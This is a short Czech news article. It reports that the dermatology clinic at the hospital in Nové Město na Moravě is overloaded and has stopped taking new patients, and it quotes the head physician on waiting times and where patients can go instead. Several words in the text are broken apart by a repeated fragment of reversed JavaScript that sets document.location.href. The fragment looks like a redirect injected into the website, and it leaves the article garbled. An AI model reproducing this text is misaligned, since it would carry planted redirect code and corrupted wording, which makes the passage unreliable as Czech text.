Rainbow page separator

V kožní ambulanci je extrémní nápor pacientů, nepřijímá další

Pátek, 3. prosince 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Dostupnost služeb novým pacientům omezuje kožní ambulance novoměstské nemocnice. Za naplněnou kapaci[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou ordinace s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojí nedávné zrušení kožní ambulance MediClinic v novoměstské poliklinice. „Nápor nových pacientů v kožní ambulanci pociťujeme už od konce roku 2019, kdy došlo k přechodnému omezení péče v kožních ambulancích ve Velkém Meziříčí a v Bystřici nad Pernštejnem. Čekací doby na vstupní vyšetření jsou opravdu dlouhé. V současné době objednáváme až na konec února 2022. Pacienti jsou tak dlouhými objednacími termíny velmi nepříjemně zaskočeni,“ vyjádřila se primářka kožního oddělení Martina Víšková.
Alespoň akutní případy se snaží zaměstnanci kožní ambulance ošetřit mezi objednanými pacienty, dlouhodobě [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ale není udržitelné. „Dochází k neúměrnému nárůstu pacientů, opravdu už bylo překročeno únosné zatížení ambulance. Není v našich silách pokrýt celou spádovou oblast. Pokud má někdo kožní potíže, měl by se primárně obracet na svého praktického lékaře nebo praktického lékaře pro děti a dorost,“ doporučila Martina Víšková. Dále je třeba preferovat vyšetření na základě místa bydliště ve spádových kožních ambulancích ve Žďáře, Bystřici nebo Meziříčí. S případným hledáním nového lékaře by měla pacien[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovi pomoci rovněž jeho zdravotní pojišťovna.